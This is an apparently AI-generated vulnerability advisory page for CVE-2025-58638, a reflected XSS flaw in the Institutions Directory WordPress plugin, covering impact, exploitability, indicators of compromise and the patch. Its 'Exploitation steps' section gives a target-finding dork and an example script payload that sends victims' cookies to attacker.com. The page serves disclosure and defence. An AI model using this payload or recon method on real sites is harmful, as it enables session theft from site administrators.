CVE-2025-58638
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-58638 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Institutions Directory WordPress plugin by e-plugins, classified under CWE-79. It affects all versions up to and including 1.3.3, with version 1.3.4 being the patched release. The vulnerability was reported on July 31, 2025, by researcher João Pedro S Alcântara (Kinorth) and published by Patchstack on August 30, 2025. It carries a CVSS v3.1 base score of 7.1 (High) (Patchstack).

Technical details

The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), allowing attacker-controlled data to be reflected back in the HTTP response without adequate sanitization or encoding. As a Reflected XSS vulnerability, exploitation requires an attacker to craft a malicious URL containing a JavaScript payload and trick an authenticated or privileged user into clicking it; the payload is then executed in the victim's browser within the context of the WordPress site. The attack vector is network-based, requires no privileges from the attacker, but does require user interaction to succeed (Patchstack).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site, potentially leading to session hijacking, credential theft, unauthorized administrative actions, or injection of malicious redirects and advertisements. The scope is changed (S:C), meaning the impact extends beyond the vulnerable component to the user's browser environment. Confidentiality, integrity, and availability are each assessed as low impact individually, but combined with the changed scope, the overall risk is rated medium-to-high (Patchstack).

Exploitability

No public proof-of-concept exploit code or active in-the-wild exploitation has been confirmed at this time. The EPSS score is approximately 0.038%, indicating a low but non-negligible probability of exploitation in the near term. Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting thousands of WordPress sites regardless of traffic or popularity. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Institutions Directory plugin version ≤ 1.3.3 using tools like WPScan, Shodan, or Google dorks (e.g., inurl:wp-content/plugins/institutions-directory).
  2. Identify vulnerable parameter: Analyze the plugin's front-end pages or search functionality to locate URL parameters that are reflected unsanitized in the HTTP response.
  3. Craft malicious URL: Construct a URL containing a reflected XSS payload in the vulnerable parameter, e.g., https://target-site.com/?institutions_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver payload: Send the crafted URL to a privileged WordPress user (e.g., administrator) via phishing email, social engineering, or embedded link.
  5. Achieve objective: When the victim clicks the link and their browser renders the page, the injected script executes — enabling session cookie theft, credential harvesting, or unauthorized actions performed under the victim's identity (Patchstack).

Indicators of compromise

  • Network: HTTP requests to WordPress pages hosting the Institutions Directory plugin containing URL-encoded JavaScript payloads (e.g., <script>, javascript:, onerror=, onload=) in query parameters; outbound requests from victim browsers to unknown external domains shortly after page load.
  • Logs: WordPress or web server access logs showing GET requests with suspicious encoded characters (%3Cscript%3E, %22, %27) in parameters associated with the institutions-directory plugin endpoints.
  • File System: Unexpected modifications to plugin files in wp-content/plugins/institutions-directory/ that may indicate post-exploitation tampering.
  • Process/Behavior: Unusual JavaScript-initiated redirects or pop-ups reported by site visitors; unexpected admin account creation or settings changes following user interaction with a suspicious link.

Mitigation and workarounds

The vendor has released version 1.3.4 of the Institutions Directory plugin, which resolves this vulnerability. Site administrators should update immediately via the WordPress plugin dashboard or by downloading the patched version from the WordPress plugin repository. Patchstack users benefit from an automatically deployed virtual patch (mitigation rule) that blocks exploitation attempts until the plugin is updated. If an immediate update is not possible, consider temporarily deactivating the plugin or restricting access to affected pages (Patchstack).

Community reactions

Patchstack, which coordinated the disclosure, classified this as a medium-priority vulnerability and issued a virtual patch for its users. The vulnerability was credited to researcher João Pedro S Alcântara (Kinorth), who reported it through Patchstack's VDP program. No significant broader media coverage or notable social media discussion has been identified for this CVE (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-19848MEDIUM6.5
  • wp-user-avatar
NoYesAug 21, 2026
CVE-2026-17559MEDIUM5.3
  • content-protector
NoYesAug 21, 2026
CVE-2026-16650MEDIUM5.3
  • charitable
NoYesAug 21, 2026
CVE-2026-15150MEDIUM5.3
  • mycred
NoYesAug 21, 2026
CVE-2026-18356LOW3.7
  • limit-login-attempts-reloaded
NoYesAug 21, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management